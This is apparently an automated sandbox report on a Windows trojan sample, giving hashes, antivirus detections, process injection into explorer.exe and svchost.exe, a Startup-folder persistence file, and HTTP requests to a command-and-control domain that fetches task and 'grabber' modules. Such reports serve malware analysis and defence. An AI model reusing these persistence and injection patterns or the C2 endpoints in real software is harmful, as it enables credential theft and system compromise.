Analysis Date: 2015-06-09 17:34:12
MD5: 820906bcee09e54893fc90ce421810b8
SHA1: 106759d5361e2a8036f6ee40f2a6ab04c86f0f0d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 405b642aea4d0e7eb5bc5a050ce42ca3 sha1: 23fac59baecd4c79e7c8b0d5739839444909ea3a size: 1024
Section BSS: md5: 99994d17f8e8c9dd30c67ee547e44b84 sha1: b91f6a31cf4f3041966d972c4da8fe40592ebd76 size: 6144
Section .ndata: md5: bba1549b3ded5ea75164c5c03d26e822 sha1: b377751b73f2ebb445d4103ad60c817e5221bdf4 size: 512
Section .rdata: md5: 2e4e8bb8854d1de9acee3d219e885f1b sha1: dca4526e3ce7def95be4c04e84fee6f8fbbc1889 size: 512
Section .reloc: md5: 9175d9b2be780182e881d91427ca9cb0 sha1: 5be43438ed9dba0846d31dad9537fc57a4d89831 size: 512
Section .rsrc: md5: 6a0b3b7e964f86bf028d38b65389ab57 sha1: de93eaedc5bd73484ab46456f51dbe6dc6027d9f size: 14848
Timestamp: 1997-08-01 17:24:02
PEhash: 56776ab9ea1d16d3036c2be16615a3ac296a9124
IMPhash: 2e32a1a1c58ecf7b0cbe186bdf09806c
AV Rising: Trojan.Win32.Generic.14579927
AV Mcafee: no_virus
AV Avira (antivir): TR/Dropper.Gen
AV Twister: Trojan.8781EE51B161B357
AV Ad-Aware: Gen:Heur.IPZ.6
AV Alwil (avast): MalOb-BI [Cryp]
AV Eset (nod32): Win32/Kryptik.FVY
AV Grisoft (avg): Generic18.BYBJ
AV Symantec: Trojan.ADH
AV Fortinet: W32/Jorik_Suslik.B!tr
AV BitDefender: Gen:Heur.IPZ.6
AV K7: no_virus
AV Microsoft Security Essentials: TrojanDownloader:Win32/Carberp.A
AV MicroWorld (escan): Gen:Heur.IPZ.6
AV MalwareBytes: no_virus
AV Authentium: no_virus
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan-Ransom.Win32.PinkBlocker
AV Emsisoft: Gen:Heur.IPZ.6
AV Zillya!: Trojan.Jorik.Win32.1116
AV Kaspersky: no_virus
AV Trend Micro: no_virus
AV CAT (quickheal): Trojan.Jorik.Carberp.e.cw6
AV VirusBlokAda (vba32): BScope.Trojan.Dropper
AV Padvish: no_virus
AV BullGuard: Gen:Heur.IPZ.6
AV Arcabit (arcavir): Gen:Heur.IPZ.6
AV ClamAV: Win.Trojan.Agent-629480
AV Dr. Web: Trojan.Packed.1530
AV F-Secure: Gen:Heur.IPZ.6
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~TM5.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~TM4.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\~TM5.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\~TM4.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\8.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\syscron.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\B.tmp
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\13.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\7.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\9.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\A.tmp
Deletes File: C:\malware.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\8.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\B.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\13.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\7.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\9.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\A.tmp
Creates Process: C:\WINDOWS\system32\svchost.exe -k netsvcs
Creates Process: C:\WINDOWS\system32\svchost.exe -k netsvcs

Process
↳ C:\WINDOWS\system32\svchost.exe -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\10.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\F.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\E.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\D.tmp
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\usernt.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\D.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\F.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\E.tmp
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: yandexsecurity.com

Process
↳ C:\WINDOWS\system32\svchost.exe -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\14.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\12.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\14.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\12.tmp
Winsock DNS: yandexsecurity.com

Network Details:

DNS: yandexsecurity.com (Type: A) ➝ 141.8.225.80
DNS: yandexsecurity.com (Type: A) ➝ 141.8.225.80
HTTP GET: http://yandexsecurity.com/task.php?id=HEXOR09F2F48419E66A986C91571E13C2E0452&task=0
  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
HTTP GET: http://yandexsecurity.com/micfile.pcp
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://yandexsecurity.com/grabber.pcp
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
Strings